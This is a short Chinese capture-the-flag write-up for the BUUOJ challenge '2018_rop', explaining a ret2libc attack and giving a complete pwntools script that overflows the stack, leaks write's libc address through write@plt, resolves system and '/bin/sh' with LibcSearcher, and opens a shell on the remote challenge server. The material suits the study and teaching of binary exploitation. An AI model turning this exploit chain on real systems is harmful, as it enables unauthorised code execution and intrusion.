铁人三项(第五赛区)_2018_rop
checksec看到保护全关,进IDA分析就是很简单的一串逻辑,在第二个函数处看到了明显的溢出,但是题目里面没有直接提供shell相关操作,所以判断本题为ret2libc,题目中给到了write函数,所以考虑使用write函数来泄露
关于write参数fd
我找到了如下解释
write() writes up to count bytes from the buffer starting at buf to the file referred to by the file descriptor fd.
概言之,就是0 stands for stdin and 1 stands for stdout,不一定正确,但是有助于记忆
from pwn import *
from LibcSearcher import *
#context.log_level="debug"
context(os='linux',arch='i386', log_level = 'debug')
#p=process('./2018_rop')
elf=ELF('./2018_rop')
p=remote('node4.buuoj.cn', 26830)
main_addr = 0x080484C6
write_plt = elf.plt['write']
write_got = elf.got['write']
payload = b'a'*(0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload=b'a'*(0x88+0x4) + p32(system_addr) + p32(system_addr) + p32(binsh_addr)
p.sendline(payload)
p.interactive()